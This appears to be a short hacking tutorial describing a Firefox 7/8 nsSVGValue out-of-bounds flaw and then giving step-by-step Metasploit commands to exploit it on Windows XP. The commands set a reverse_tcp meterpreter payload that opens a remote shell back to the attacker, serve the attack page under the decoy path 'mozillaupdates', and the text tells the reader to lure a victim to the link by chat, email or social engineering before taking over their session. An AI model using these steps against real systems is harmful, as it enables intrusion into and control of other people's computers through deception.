This module exploits an out-of-bounds access flaw in Firefox 7 and 8 (<= 8.0.1). The notification of nsSVGValue observers via nsSVGValue::Notify Observers(x,y) uses a loop which can result in an out-of-bounds access to attacker-controlled memory. The mObserver ElementAt() function (which picks up pointers), does not validate if a given index is out of bound. If a custom observer of nsSVGValue is created, which removes elements from the original observer, and memory layout is manipulated properly, the ElementAt() function might pick up an attacker provided pointer, which can be leveraged to gain remote arbitrary code execution.
Mozilla Firefox 7
Windows XP SP2
Windows XP SP3
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/Mozilla_nssvgvalue
Msf exploit (Mozilla_nssvgvalue)>set payload windows/meterpreter/reverse_tcp
Msf exploit (Mozilla_nssvgvalue)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (Mozilla_nssvgvalue)>set srvhost 192.168.1.2 (This must be an address on the local machine)
Msf exploit (Mozilla_nssvgvalue)>set uripath mozillaupdates (The Url to use for this exploit)
Msf exploit (Mozilla_nssvgvalue)>exploit
Now an URL you should give to your victim //192.168.1.2:8080/mozillaupdates
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“